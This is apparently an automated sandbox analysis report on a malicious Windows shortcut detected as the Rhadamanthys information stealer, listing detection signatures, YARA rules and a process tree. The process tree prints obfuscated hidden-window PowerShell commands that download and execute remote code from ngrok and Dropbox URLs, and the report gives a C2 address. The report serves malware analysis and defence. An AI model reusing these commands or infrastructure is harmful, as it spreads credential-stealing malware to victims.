Edit tour
Windows
Analysis Report
0J3fAc6cHO.lnk
Overview
General Information
Sample name: | 0J3fAc6cHO.lnkrenamed because original name is a hash value |
Original sample name: | 8cada476b5aafb44e1f9557552ca0dae8a174ef3aee47361b7b421d65d1df261(1).lnk |
Analysis ID: | 1576693 |
MD5: | d2d848346bc9a44be0141ba30c133cfc |
SHA1: | 646e74f17cc55e2d9631a2174adfd4d5b2e8412c |
SHA256: | 8cada476b5aafb44e1f9557552ca0dae8a174ef3aee47361b7b421d65d1df261 |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 6156 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias aa2 841 curl ; sal av96d c iEx ; av 96dc(aa284 1 -Uri htt ps://1zf9c ygs0q3iviy owq83ddwzw tgf78rh.ng rok.app/ap i/secure/6 dc5ab464f5 bc22bbff39 34d6183060 6 -UseBasi cParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3480 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias aa2841 curl ; sa l av96dc i Ex ; av96d c(aa2841 - Uri https: //1zf9cygs 0q3iviyowq 83ddwzwtgf 78rh.ngrok .app/api/s ecure/6dc5 ab464f5bc2 2bbff3934d 61830606 - UseBasicPa rsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 2380 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/51s9d8on fy15b992c2 555/Dokume nt-analizy -narusze-p raw-autors kich.pdf?r lkey=rd8jt 5nvhndaetv xdprpig90q &dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 1996 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=22 36 --field -trial-han dle=2028,i ,969168065 8605753905 ,150473916 9661148908 ,262144 /p refetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - cmd.exe (PID: 8356 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\2055 147785.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8448 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8532 cmdline:
powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/5 1s9d8onfy1 5b992c2555 /Dokument- analizy-na rusze-praw -autorskic h.pdf?rlke y=rd8jt5nv hndaetvxdp rpig90q&dl =1' -OutFi le $Random PDF; Start -Process - FilePath ' msedge.exe ' -Argumen tList '--k iosk', $Ra ndomPDF; I nvoke-WebR equest -Ur i 'https:/ /www.dropb ox.com/scl /fi/g33vds 4uvy26a8v7 ble7g/runn er.exe?rlk ey=cqe2asm ea4sh0uo2x xsstxzdd&d l=1' -OutF ile $Rando mEXE; Star t-Process -FilePath $RandomEXE ; if (Test -Path $Ran domEXE) { Invoke-Web Request -U ri 'https: //1zf9cygs 0q3iviyowq 83ddwzwtgf 78rh.ngrok .app/metad ata/6dc5ab 464f5bc22b bff3934d61 830606'; } " MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 8436 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\562225 3b-f54a-4c ad-af64-79 5d524a2bab .pdf MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8416 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=10 12 --field -trial-han dle=1968,i ,159405424 6509652003 8,85815829 8726471364 9,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - 933d8aec-ae86-4e0a-8a0a-8d74c5daaa60.exe (PID: 768 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\933d8a ec-ae86-4e 0a-8a0a-8d 74c5daaa60 .exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) - 933d8aec-ae86-4e0a-8a0a-8d74c5daaa60.exe (PID: 6180 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\933d8a ec-ae86-4e 0a-8a0a-8d 74c5daaa60 .exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) - fontdrvhost.exe (PID: 8004 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 4592 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 8060 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 4 592 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 1628 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 180 -s 440 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 320 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 5300 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/5 1s9d8onfy1 5b992c2555 /Dokument- analizy-na rusze-praw -autorskic h.pdf?rlke y=rd8jt5nv hndaetvxdp rpig90q&dl =1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7296 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=25 68 --field -trial-han dle=2500,i ,165194084 3655757513 4,16982295 3556188085 67,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8272 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6488 --fie ld-trial-h andle=2500 ,i,1651940 8436557575 134,169822 9535561880 8567,26214 4 /prefetc h:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8328 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6624 --field-t rial-handl e=2500,i,1 6519408436 557575134, 1698229535 5618808567 ,262144 /p refetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8664 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_collecti ons.mojom. Collection sDataManag er --lang= en-GB --se rvice-sand box-type=c ollections --mojo-pl atform-cha nnel-handl e=6972 --f ield-trial -handle=25 00,i,16519 4084365575 75134,1698 2295355618 808567,262 144 /prefe tch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 9160 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=8376 --field-t rial-handl e=2500,i,1 6519408436 557575134, 1698229535 5618808567 ,262144 /p refetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 5036 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=674 4 --field- trial-hand le=2500,i, 1651940843 6557575134 ,169822953 5561880856 7,262144 / prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |